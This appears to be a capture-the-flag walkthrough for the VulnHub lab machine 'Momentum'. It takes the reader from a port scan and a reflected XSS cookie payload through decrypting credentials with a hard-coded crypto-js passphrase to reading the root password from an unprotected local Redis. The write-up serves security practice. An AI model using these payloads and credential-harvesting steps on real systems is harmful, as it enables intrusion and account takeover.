Momentum

Posted on | In ,

You’ll find this vm here : https://www.vulnhub.com/entry/momentum-1,685/

Port Scan

1
2
22/tcp open  ssh
80/tcp open  http

XSS

1
http://10.0.2.239/opus-details.php?id=<script>alert(document.cookie)</script>

Result : cookie=U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt

Read main.js

1
view-source:http://10.0.2.239/js/main.js

1
2
3
var CryptoJS = require("crypto-js");
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));

Decrypt

First install packages

1
npm install crypto-js

1
2
3
var CryptoJS = require("crypto-js");
var decrypted = CryptoJS.AES.decrypt("U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt", "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));

Result

1
2
3
┌──(alienum㉿kali)-[~/Desktop]
└─$ node decrypt.js
auxerre-<REMOVED>##

SSH | Guess username

username : auxerre password : auxerre-<REMOVED>##

Redis

1
2
auxerre@Momentum:~$ ss -an | grep 6379
tcp    LISTEN  0    128     127.0.0.1:6379    0.0.0.0:*

Finding root password

1
2
3
4
5
6
7
8
9
10
auxerre@Momentum:~$ redis-cli
127.0.0.1:6379> KEYS *
1) "rootpass"
127.0.0.1:6379> GET rootpass
"m0mentum-<REMOVED>##"
127.0.0.1:6379>exit
auxerre@Momentum:~$ su root
Password:
root@Momentum:/home/auxerre# cd
root@Momentum:~#